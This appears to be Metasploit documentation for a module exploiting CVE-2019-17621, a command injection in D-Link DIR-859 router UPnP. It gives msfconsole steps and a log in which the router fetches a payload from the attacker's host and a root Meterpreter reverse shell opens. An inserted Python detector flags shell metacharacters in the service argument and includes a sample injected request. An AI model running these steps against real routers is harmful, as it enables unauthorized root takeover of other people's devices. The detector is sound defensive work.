metasploit-gs/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md
secenv 09801b2507 Add router module/firmware version tested
... under Scenarios, as suggested by @space-r7
2020-01-17 20:57:44 -03:00

Introduction

This module exploits CVE-2019-17621, a remote, unauthenticated OS command injection in the UPnP API of the D-Link DIR-859 and other D-Link SOHO routers, reached through the service argument of the gena.cgi URL.
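Because the page only describes the injection point, here is an added example (not part of the module documentation or of Metasploit) from the defender's side: it parses HTTP request lines as a proxy or IDS capture might record them and flags any gena.cgi request whose service argument carries shell metacharacters. The sample lines, the function names and the metacharacter set are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Characters that have no place in a UPnP service identifier but are
# what an OS command injection through a system() call relies on.
SHELL_META = re.compile(r"[`$;|&\n]")

# Constructed request lines in "<method> <target> <version>" form: one
# benign GENA subscription, one with an injected command, one unrelated.
SAMPLE_LINES = [
    "SUBSCRIBE /gena.cgi?service=WANIPConnection HTTP/1.1",
    "SUBSCRIBE /gena.cgi?service=WANIPConnection%3Becho%20probe HTTP/1.1",
    "GET /index.html HTTP/1.1",
]


def analyse_request_line(line):
    """Return a finding for a gena.cgi request, or None for anything else.

    The finding records the decoded service argument and whether it
    contains shell metacharacters. The method is kept but not filtered
    on, so a GET or POST to the same endpoint is still examined.
    """
    parts = line.strip().split(" ")
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    url = urlsplit(target)
    if not url.path.endswith("/gena.cgi"):
        return None
    # Pull the raw service value before decoding so that an encoded '&'
    # or ';' inside it cannot split the value into a separate parameter.
    match = re.search(r"(?:^|&)service=([^&]*)", url.query)
    service = unquote(match.group(1)) if match else ""
    return {
        "method": method,
        "service": service,
        "suspicious": SHELL_META.search(service) is not None,
    }


def scan(lines):
    """Return only the findings whose service argument looks injected."""
    findings = (analyse_request_line(line) for line in lines)
    return [f for f in findings if f and f["suspicious"]]
```

A missing or empty service argument yields a non-suspicious finding rather than an alert, so the check reports only the injection pattern the advisory describes.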

Vulnerable Application

Get a D-Link DIR-859 router (or any of the devices/firmware versions mentioned here), or download firmware version 1.06 or 1.05 and run it under Firmadyne or a similar emulation framework.

Verification Steps

  1. Set up the router or emulated device
  2. Start msfconsole
  3. Do: use exploit/linux/upnp/dlink_dir859_subscribe_exec
  4. Do: set RHOSTS <router_ip>
  5. Do: set LHOST <local_ip>
  6. Do: run
  7. You should get a session as root.

Scenarios

msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run 

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP
[*] Client 192.168.0.1 (Wget) requested /r2hOQycyVvN2BP
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Meterpreter session 7 opened (192.168.0.2:4444 -> 192.168.0.1:54599) at 2020-01-10 11:36:52 -0300
[*] Server stopped.

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo 
Computer     : 192.168.0.1
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter >